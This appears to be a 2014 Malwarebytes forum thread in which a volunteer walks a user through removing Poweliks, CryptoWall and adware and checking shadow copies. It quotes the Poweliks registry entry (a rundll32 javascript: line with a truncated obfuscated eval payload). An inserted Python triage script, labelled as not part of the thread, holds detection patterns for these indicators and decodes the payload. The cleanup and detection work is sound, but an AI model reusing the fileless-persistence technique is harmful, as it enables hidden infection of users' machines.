Windows Genuine Advantage, Cryptowall, Poweliks, and fff5ee all at once


CJN853

Cleaned up WGA and Cryptowall Monday evening with Malwarebytes and determined that the damage started Sunday morning.  Thought I was clean but still seeing symptoms of Poweliks, fff533, and f0ff0, so also ran root beta, adwcleaner, and MS Malware Removal.  Uninstalled java8 so that the IE temp files would stop flooding %temp%.  Still seeing IE security settings changing and Trend is still blocking fff5ee, f0ff0, and fa8072, so I know I am not done yet!

 

FRST64 output attached.  Please help if you think this might be salvageable.  I want to be sure I am clean before I start picking through what might be saved from Sunday night's backup, as Cryptowall hadn't yet struck 100% of my files.

 

Thanks in advance!

Addition.txt

FRST.txt


Hello CJN853, welcome to Malwarebytes' Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • If you are unable to copy/paste your logs directly into your post, please attach the file. 
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation and providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable.
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you will require additional time to complete my instructions.
  • Ensure you are following this topic. Click Follow this topic at the top of the page.
     

======================================================
 

Please help if you think this might be salvageable.

Yes, we can clear up the malware. 
Depending on the variant of CryptoWall, your encrypted files may be recoverable without the need of restoring from a backup. Once the malware has been removed, we can look into this.
 

  • Press the Windows Key + r on your keyboard at the same time. Type inetcpl.cpl and click OK.
  • Click Security
  • Click Custom level....
  • Scroll down to Downloads.
  • Under File download, place a checkmark next to Enable.
  • Click OK.
     

STEP 1
Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    HKU\S-1-5-21-2396288121-3525874122-1808719847-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    Startup: C:\Users\Mom and Dad\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler V3.exe (Leader Technologies)
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    SearchScopes: HKLM - DefaultScope {49606DC7-976D-4030-A74E-9FB5C842FA68} URL =
    U2 TMAgent; No ImagePath
    Folder: C:\Users\Mom and Dad\AppData\Local\EmieBrowserModeList
    2014-11-11 18:07 - 2014-11-11 18:07 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{FAC3652E-2396-4926-ADC1-1B92C7079871}
    2014-11-11 05:40 - 2014-11-11 05:40 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9DE7D7DF-F82C-481A-BC8C-9D706E099B3A}
    2014-11-10 11:04 - 2014-11-10 20:01 - 00000064 _____ () C:\Users\Mom and Dad\AppData\Roaming\svc-cmkf.exe.bat
    2014-11-10 09:33 - 2014-11-10 09:33 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{46A51C6F-F5D4-4867-BB24-9DCD160F478D}
    2014-11-09 16:56 - 2014-11-09 16:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{E79AF4D6-4DD7-4760-B5F2-14D1FE1F6531}
    2014-11-09 10:56 - 2014-11-10 10:43 - 00000160 ____H () C:\ProgramData\@system3.att
    2014-11-09 10:55 - 2014-11-10 20:37 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Roaming\FrameworkUpdate7
    2014-11-09 10:55 - 2014-11-10 11:54 - 00000424 _____ () C:\ProgramData\@system.temp
    2014-11-09 10:54 - 2014-11-10 20:37 - 00000000 ___HD () C:\4ab75cf
    2014-11-09 10:54 - 2014-11-10 11:04 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
    2014-11-08 11:00 - 2014-11-08 11:00 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{204B6AAF-9BB9-400E-A047-5CC726B3B745}
    2014-11-07 06:56 - 2014-11-07 06:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{7F31197E-F2C9-4AFB-A85E-683455E48736}
    2014-11-06 11:32 - 2014-11-06 11:32 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{05A0B7F0-4B81-4D51-8CAA-FECFA405F8FC}
    2014-11-05 22:14 - 2014-11-05 22:14 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{E0A208BD-5D90-4D12-9440-5E7C57B8C45F}
    2014-11-05 09:56 - 2014-11-05 09:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{4FCAB811-DA8D-4A70-8CDC-84E8BCA3DB58}
    2014-11-04 21:46 - 2014-11-04 21:46 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B0D244A4-2694-4E25-B05E-A57AD4888EE7}
    2014-11-04 09:36 - 2014-11-04 09:36 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B333DCAC-C7C7-4ABD-8E21-8948C8CCFFD8}
    2014-11-03 10:00 - 2014-11-03 10:00 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{DE9365F6-9775-4ACE-8C4C-C77C3317E678}
    2014-11-02 12:52 - 2014-11-02 12:52 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{1F5E55AD-0F14-40A6-8271-FA7A83B86084}
    2014-11-07 21:45 - 2014-11-07 21:45 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6E2FED2B-1A67-4686-B599-5C2AE5047D5D}
    2014-11-01 23:03 - 2014-11-01 23:03 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{55CC58EB-DBE5-4866-B697-4CD70363A04B}
    2014-11-01 08:44 - 2014-11-01 08:44 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9F0FBC11-96DD-4825-A2E6-D87CD26B2FDE}
    2014-10-31 07:35 - 2014-10-31 07:35 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{02DDB402-9617-40D7-8BA6-24262E926182}
    2014-10-30 19:26 - 2014-10-30 19:26 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{40DBE95E-9958-489A-91F7-721859F2CA36}
    2014-10-30 07:16 - 2014-10-30 07:16 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{F2A78929-CF74-4C2E-A880-866F7168CB69}
    2014-10-29 11:18 - 2014-10-29 11:18 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{0B8F622B-EE15-42AE-BE6E-74424339C720}
    2014-10-28 22:51 - 2014-10-28 22:51 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{AD79057D-BCC6-4F41-B9CF-3D78179B71F8}
    2014-10-28 22:27 - 2014-10-28 22:27 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{31C1C2C6-EC68-4D93-B7F4-93AC8D695F9F}
    2014-10-28 19:48 - 2014-10-28 19:49 - 00001829 _____ () C:\Users\Mom and Dad\AppData\Roaming\c006d3e1
    2014-10-28 19:48 - 2014-10-28 19:49 - 00000048 _____ () C:\Users\Mom and Dad\AppData\Roaming\c006d3e2
    2014-10-28 19:48 - 2014-10-28 19:48 - 00000944 ____H () C:\ProgramData\@system2.att
    2014-10-28 19:48 - 2014-10-28 19:48 - 00000448 ____H () C:\Users\Mom and Dad\AppData\Roaming\麽鎒駓覜
    2014-10-28 07:30 - 2014-10-28 07:30 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{434246B6-A7CA-47C9-AB53-05A8B9A01000}
    2014-10-27 13:56 - 2014-10-27 13:56 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{25F3A586-4CDE-46CC-B4F4-0E035E5D4606}
    2014-10-26 20:48 - 2014-10-26 20:48 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5A144CE8-B7D9-46FF-87C6-56729C7D9CD5}
    2014-10-26 08:41 - 2014-10-26 08:41 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{DE9EB159-FC16-4323-8D63-EB8804318680}
    2014-10-25 10:48 - 2014-10-25 10:48 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{F31DCCB5-1D89-4306-8683-9C6053F44DD9}
    2014-10-24 21:54 - 2014-10-24 21:54 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{C0863BE8-CCC1-49DF-9693-8DBA11977919}
    2014-10-24 09:06 - 2014-10-24 09:06 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6223EC97-8E75-4F83-9970-B346E7855782}
    2014-10-23 10:23 - 2014-10-23 10:23 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{68CC3DC6-A2BB-468A-AC8E-135385101685}
    2014-10-22 21:34 - 2014-10-22 21:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{78B561E0-F39E-4773-92D3-CC310559CB28}
    2014-10-22 06:33 - 2014-10-22 06:33 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{475760E4-BC31-4881-A757-661575830867}
    2014-10-21 08:21 - 2014-10-21 08:21 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{7AFF3E34-9F81-4CF1-8BA3-6C19CF3E2ADC}
    2014-10-20 10:24 - 2014-10-20 10:24 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{3B5B6225-B669-436A-A08A-64D94FB71BB6}
    2014-10-20 10:05 - 2014-10-20 10:05 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{9194EA7B-F3AB-4323-B32C-C910A5B9162C}
    2014-10-20 08:01 - 2014-10-20 08:01 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{08C5FA6F-07A4-4D19-912B-C3064ABFCCFA}
    2014-10-19 12:23 - 2014-10-19 12:23 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{426AE19E-5198-4047-A22A-62361F078927}
    2014-10-19 00:22 - 2014-10-19 00:22 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{B763FAE8-02F9-40DD-B726-D3DFD9CA7944}
    2014-10-18 11:02 - 2014-10-18 11:02 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5EB17C21-1CA5-4C87-A06E-4C80F532D7B6}
    2014-10-17 19:19 - 2014-10-17 19:19 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{BC428FE6-4D1E-4111-846F-ABE0E2FD06C9}
    2014-10-17 07:18 - 2014-10-17 07:18 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{256B339C-4233-4C80-A938-23322F3124B4}
    2014-10-16 09:13 - 2014-10-16 09:13 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{0D7C6D29-8770-48E0-8408-8448943AA2DE}
    2014-10-15 12:07 - 2014-10-15 12:07 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{C0A2C253-FA5C-437C-9C99-0E7125E265BF}
    2014-10-15 11:03 - 2014-10-15 11:03 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{5B194868-C8DF-43BA-9115-42D5D50D1A0F}
    2014-10-14 22:34 - 2014-10-14 22:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{6CF0831F-6AE3-4908-A440-CFA2B0491500}
    2014-10-14 10:34 - 2014-10-14 10:34 - 00000000 ____D () C:\Users\Mom and Dad\AppData\Local\{4D9F816D-245B-4576-A788-AA51A960E6CE}
    C:\Users\Public\dcmsvcsetup.exe
    C:\Users\Public\invokesi.exe
    CustomCLSID: HKU\S-1-5-21-2396288121-3525874122-1808719847-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset all
    CMD: netsh int ipv4 reset
    CMD: netsh int ipv6 reset
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name.
  • Important: In the Encoding: drop-down box, select Unicode.
  • Important: The file must be saved in the same location as FRST64.exe.

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
Malwarebytes Anti-Malware (MBAM)

  • Open Malwarebytes Anti-Malware and click Update Now.
  • Once updated, click the Settings tab, followed by Detection and Protection and tick Scan for rootkits.
  • Click the Scan tab, ensure Threat Scan is checked and click Scan Now.
  • Note: You may see the following message, "Could not load DDA driver". Click Yes, allow your PC to reboot and continue afterwards.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • Click Copy to Clipboard and paste the log in your next reply. 
     

STEP 3
ComboFix

  • Note: Please read through these instructions before running ComboFix. 
  • Please download ComboFix and save the file to your Desktop. << Important!
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click ComboFix.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
     
  • Allow ComboFix to complete its removal routine (please refer to Important Notes:).
  • Upon completion, a log (ComboFix.txt) will be created in the root directory (C:\). Copy the contents of the log and paste in your next reply.
  • Re-enable your anti-virus software.
     

Important Notes:

  • Do NOT mouse click ComboFix's window whilst it is running. This may cause the programme to stall.
  • Do NOT use your computer whilst ComboFix is running.
  • Your Desktop/taskbar may disappear whilst ComboFix is running; this is normal.
     
  • If you get the message Illegal operation attempted on registry key that has been marked for deletion please reboot your computer.
  • ComboFix will disconnect your machine from the Internet as soon as it starts.
  • Please do not attempt to re-connect your machine back to the Internet until ComboFix has completely finished.
  • If you are unable to access the Internet after running ComboFix, please reboot your computer. 
     

STEP 4
TDSSKiller Scan

  • Please download TDSSKiller and save the file to your Desktop.
  • Right-Click TDSSKiller.exe and select Run as administrator to run the programme.
  • Click Change parameters. Place a checkmark next to:
    • Loaded Modules
    • Detect TDLFS file system
    • Verify file digital signatures
  • Note: If you receive the following message: Extended Monitoring Driver is required, click Reboot now, and continue from here following the reboot.
  • Click Start Scan. Do not use the computer during the scan.
  • If objects are found, change the action to skip.
  • Click Continue and close the window.
  • A log will be created and saved to the root directory (usually C:\). Attach the log in your next reply.
     

STEP 5
Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Yes to the disclaimer.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
     

======================================================
 
STEP 6
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • MBAM log
  • ComboFix.txt
  • TDSSKiller log (attached!)
  • FRST.txt
  • Addition.txt
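As an added example (not part of this thread, of FRST, or of Malwarebytes' tooling), the following Python triage helper flags the three indicator classes singled out in the fixlist above in FRST-style log lines: the Poweliks-style CLSID LocalServer32 entry whose "program" is a rundll32 javascript: one-liner, the Internet Explorer policy restriction, and the numerically named Safe Mode driver. It also decodes the shifted eval() fragment to show why that entry is a script rather than a file path. The sample lines are constructed from the entries on this page; the ExampleUpdater line, the rule labels and the severities are my own assumptions.

```python
import re

# Constructed sample: FRST-style lines modelled on the entries posted in this
# thread (the CLSID, SID and paths are the ones on the page). The last line is
# a constructed benign autorun for contrast.
SAMPLE_FRST_LINES = [
    r'CustomCLSID: HKU\S-1-5-21-2396288121-3525874122-1808719847-1000_Classes'
    r'\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> '
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";'
    r'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds',
    r'HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction '
    r'<======= ATTENTION',
    r'HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31681020.sys'
    r' => ""="Driver"',
    r'Startup: C:\Users\Mom and Dad\AppData\Roaming\Microsoft\Windows\Start Menu'
    r'\Programs\Startup\PowerReg Scheduler V3.exe (Leader Technologies)',
    r'HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe',
]

# Triage rules: (label, pattern, severity). The first three correspond to the
# entries Adam marked in the fixlist; the last is a low-confidence hint only.
RULES = [
    ("fileless CLSID persistence: LocalServer32 handler is a rundll32 javascript: one-liner",
     re.compile(r"localserver32.*rundll32\.exe\s+javascript:", re.I), "high"),
    ("Internet Explorer policy lockdown (explains security settings reverting)",
     re.compile(r"Policies\\Microsoft\\Internet Explorer: Policy restriction", re.I), "high"),
    ("numerically named driver registered to load in Safe Mode",
     re.compile(r"SafeBoot\\(Minimal|Network)\\\d+\.sys", re.I), "medium"),
    ("Startup-folder autorun; confirm the publisher before keeping it",
     re.compile(r"^Startup: .*\\Startup\\", re.I), "low"),
]


def triage(lines):
    """Return one finding per (line, matching rule) as dicts with severity, label and line."""
    findings = []
    for line in lines:
        for label, pattern, severity in RULES:
            if pattern.search(line):
                findings.append({"severity": severity, "label": label, "line": line})
    return findings


def obfuscated_fragment(line):
    """Extract the string handed to eval() in a CLSID line, or None if absent."""
    match = re.search(r'eval\("([^"]*)', line)
    return match.group(1) if match else None


def deobfuscate_shift(fragment, shift=-1):
    """Reverse a uniform per-character code-point shift.

    The eval() payload in this thread stores its script with every character
    moved up by one ('epdvnfou' for 'document'); shifting back by one recovers
    readable JavaScript. Assumption: the whole fragment uses the same shift.
    """
    return "".join(chr(ord(ch) + shift) for ch in fragment)


if __name__ == "__main__":
    for finding in triage(SAMPLE_FRST_LINES):
        print(f"[{finding['severity']}] {finding['label']}\n    {finding['line']}")
    fragment = obfuscated_fragment(SAMPLE_FRST_LINES[0])
    print("decoded eval() prefix:", deobfuscate_shift(fragment))
```

Running it on a full FRST.txt (one line per list element) gives a first-pass list of what to look at; a clean line that matches nothing is simply not reported.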

Hi Chris, 
 
Those logs are looking much better. 
 

Sorry, Adam.  I just realized I didn't follow explicitly on what to copy-paste, vs attach.  Unfortunately, IE is not letting me paste as instructed.

No problem. This is an issue with Internet Explorer. 
You're welcome to continue attaching your logs. 
 
The following steps will just about deal with the malware removal process. 
 
STEP 1
Browser Reset
 
Instructions on how to backup your Favourites/Bookmarks and other data can be found below.

Proceed with the reset once done.

STEP 2
AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Report. A log (AdwCleaner[R0].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark, and click Clean
  • Follow the prompts and allow your computer to reboot
  • After rebooting, a log (AdwCleaner[s0].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and registry key backups are made for anything removed using this tool. Should a legitimate entry be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the entry. Please do not overly concern yourself with the contents of AdwCleaner[R0].txt.
 

STEP 3
Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Note: If you unchecked any items in AdwCleaner, please backup the associated folders/files before running JRT.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 4
ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Hide advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click List of found threats. If no threats were found, skip the next two bullet points. 
  • Click Export to text file and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to Uninstall application on close and click Finish.
  • Re-enable your anti-virus software.
  • Attach the log in your next reply. 
     

======================================================

STEP 5
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Did IE reset OK?
  • AdwCleaner[s0].txt
  • JRT.txt
  • ESET log (attached!)

Hi Chris, 
 
That ESET log is not what I was expecting. 
I was expecting to see detections for ransom notes left behind by CryptoWall. Can you still see ransom notes left by the infection? 
What are the names of the files? 
 
Excluding your encrypted files, are there any outstanding issues with the machine?

Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKU\S-1-5-21-2396288121-3525874122-1808719847-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    C:\Users\Mom and Dad\AppData\Local\Temp\{C41981D2-DCE3-4C34-A807-FB699757F778}.exe
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31681020.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31681020.sys => ""="Driver"
    C:\Users\Mom and Dad\Downloads\cbsidlm-cbsi213-ShadowExplorer-SEO-75857753.exe
    C:\Users\Mom and Dad\Downloads\FeedingFrenzy_Setup-dm.exe
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.

Adam:

 

The reason you are not seeing the DECRYPT_INSTRUCTION files (three per attacked directory) is that I had removed them already earlier in the week when I thought I was clean the first time.  I did save the log out of the registry listing all the files that were touched by Cryptowall, though.

 

Interesting that on this last FRST, Trend Max Security detected the activity when I hit 'fix', blocked the action, and removed the exe.  I unblocked the program and restored the exe to the desktop in order to run.  Fixlog is attached...

 

As far as outstanding issues, I do not see %temp% filling up, nor the multiple dllhost *32 processes.  But...  I have not reinstalled Java8 yet (not going to do that until you tell me we are totally finished).  I am a little surprised at how much stuff LOCAL SERVICE and SYSTEM are running, using almost 1/4 of 8Gb physical memory.  I didn't think/realize I had that many services loading automatically.

 

So what do you think next?  You have been a huge help so far.

 

Thanks,

 

Chris

 

 

Fixlog.txt


Was INSTALL_TOR.html one of the ransom files?

If you were infected with the first variant of CryptoWall (rather than the second), you may be able to restore your files using shadow volume copies.

Updating vulnerable software is on the list of things to do. As for Java - unless you have a specific purpose for the programme, I'd stay well clear.


I don't recall seeing that one.  There were three, all with DECRYPT_INSTRUCTION as the root of the file name.  Would INSTALL_TOR.html have been in every directory?  Or a one-time occurrence?

 

Thanks for the tip on Java...  When we are done here, I will remove from my laptop as well (I think we'll scrub that one in another post next!)

 

So....  what next?


Hi Chris, 
 
INSTALL_TOR would have been in every folder with an encrypted file. The presence of this file would indicate a CryptoWall 2.0 infection - meaning recovery of your files would not be possible. 
 
-------------------------
 
Here's some information on Java. 
 
Using Java is an unnecessary security risk; especially using older versions which have vulnerabilities that malicious sites can use to exploit and infect your system.

Java is one of those technologies that you find installed on the majority of computer systems despite the fact that average users do not come across many Java-powered websites or desktop applications [...] According to W3Techs, only four percent of websites use Java on the server side [...] it is used by 0.2 percent of all websites on the client side. And two tenths of a percent includes sites that do not use it for their core functionality [...] there are sites and applications that require Java, and if you use any of them, you obviously need Java. But that makes you a minority. The majority of Internet users do not need Java. They do not need the Java plugin, nor do they need the Java Runtime Environment installed on their operating system.

-------------------------
 
Regarding your encrypted files - the following may work. 
 
Please locate an encrypted file, and let me know if the following works. 
To restore individual files you can right-click on the file, go into Properties, and select the Previous Versions tab. This tab will list all copies of the file that have been stored in a Shadow Volume Copy and the date they were backed up as shown in the image below.
 

[Image: the Previous Versions tab of a file's Properties dialog, listing the available Shadow Volume Copies and their dates]

 
To restore a particular version of the file, simply click on the Copy button and then select the directory you wish to restore the file to. If you wish to restore the selected file and replace the existing one, click on the Restore button. If you wish to view the contents of the actual file, you can click on the Open button to see the contents of the file before you restore it.
This same method can be used to restore an entire folder. Simply right-click on the folder and select Properties and then the Previous Versions tabs. You will then be presented with a similar screen as above where you can either Copy the selected backup of the folder to a new location or Restore it over the existing folder.

 
-------------------------
 
We need to update your vulnerable software to reduce the risk of reinfection. 
 
STEP 1
Update Outdated Software

Outdated software contain security risks that must be patched. Please download and install the latest version of the programmes below.

STEP 2
Remove Outdated Software

  • Press the Windows Key + r on your keyboard at the same time. Type appwiz.cpl and click OK.
  • Search for the following programmes, right-click and click Uninstall one at a time.
  • Note: The programmes below may not be present. If this is the case, please skip to the next step.
    • Adobe Reader X (10.1.12) MUI 
  • Follow the prompts, and reboot if necessary.
     

STEP 3
Security Check

  • Please download SecurityCheck and save the file to your Desktop.
  • Double-click SecurityCheck.exe and follow the onscreen instructions inside the black box.
  • A log (checkup.txt) will automatically open on your Desktop.
  • Copy the contents of the log and paste in your next reply.
     

======================================================
 
STEP 4
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Update on encrypted files
  • checkup.txt
  • How is your computer performing? Are there any outstanding issues?

Hey, Adam.  Sorry for the delay in responding, but the forum was down last night.

 

I never saw an INSTALL_TOR file in any of the directories, but restore points had been disabled and cleared, so my last windows recovery and Previous Versions are 12-Nov when I turned it back on and got it to stay on.  Similar story browsing with Shadow Explorer.  I fear that when I was mucking around last Mon/Tues/Wed trying to clean on my own I ran a disk cleanup... so while the malware did the disabling, I did the clear in a misguided attempt to disinfect.

 

Any hope beyond piecing together unencrypted portions of my backup?  I am starting to wonder if I need to start over with the factory image, if enough data files related to installed software got damaged.  But I won't give up until you tell me, "give up".  I do have the export from the registry of what files it encrypted so I at least have a handle on what exactly got hit.

 

No problem with the Adobe uninstall / reinstall.  Air did not ask about auto updates, but I have the other two set up to update automatically.  Windows is up to date.  Interesting thing was that last Monday when I was disinfecting the first time (unsuccessfully), I saw that there were failed updates going back to mid-Oct.  So something or things had been opening holes for some time, I just didn't recognize the signs for what they were (like the increase in blocked Web Threats in Trend starting about the same time period).

 

Security check log is attached.  There is still a java warning even though that is no longer installed on the machine.

 

Computer is basically performing OK.  A lot more disk activity than I think is normal.  svchost.exe is using about double the memory I would expect (217,140k).  Also, Trend is no longer starting automatically, but I am thinking to uninstall / reinstall per their recommendation when this happens.  I'll wait until you say "OK" before doing so though.

 

Again, thanks.

 

Chris

 

checkup.txt


Hi Chris, 
 

Any hope beyond piecing together unencrypted portions of my backup?  I am starting to wonder if I need to start over with the factory image, if enough data files related to installed software got damaged.  But I won't give up until you tell me, "give up".

Please upload an encrypted file to my channel for analysis.
 

Interesting thing was that last Monday when I was disinfecting the first time (unsuccessfully), I saw that there were failed updates going back to mid-Oct. 

Are all Updates now successfully installed?
 

Security check log is attached.  There is still a java warning even though that is no longer installed on the machine.

That's fine.
 

A lot more disk activity that I think is normal.  svchost.exe is using about double the memory I would expect (217,140k).

Is this with no open programmes?
 

Also, Trend is no longer starting automatically, but I am thinking to uninstall / reinstall per their recommendation when this happens.  I'll wait until you say "OK" before doing so though.

Yes, I would go ahead and reinstall. 
Please download the setup file before uninstalling. Then disconnect from the Internet, open the setup file, and install the programme. Once installed, connect to the Internet, ensure the programme is fully up-to-date, and run a scan.


Adam:

 

File is uploaded...  Word document containing lyrics to the Chicago Bears fight song.

 

Yes, all updates are successfully installed.  In fact, Windows autoupdated and restarted on a security update dated today.

 

Good news on the security check?  Awesome...  Thanks for your help getting to this point!

 

Yes, no open programs.  Disk usage is normal at the moment and svchost is using about 193k.

 

I'll let you know if I have any issues with Trend.

 

Thanks,

 

Chris

 

 


Hi Chris, 
 
Please run this programme for me. 
 
IDTool

  • Please download IDTool and save the file to your Desktop.
  • Right-Click idtool.zip and click Extract All. Select your Desktop and click Extract.
  • Right-Click IDTool.exe and click Run as administrator to run the programme. 
  • If you're prompted to download and install Microsoft .NET Framework, please agree. 
  • Allow the programme to collect the necessary data. 
  • Once the main console is loaded, click Rescan Computer and Generate a New Report.
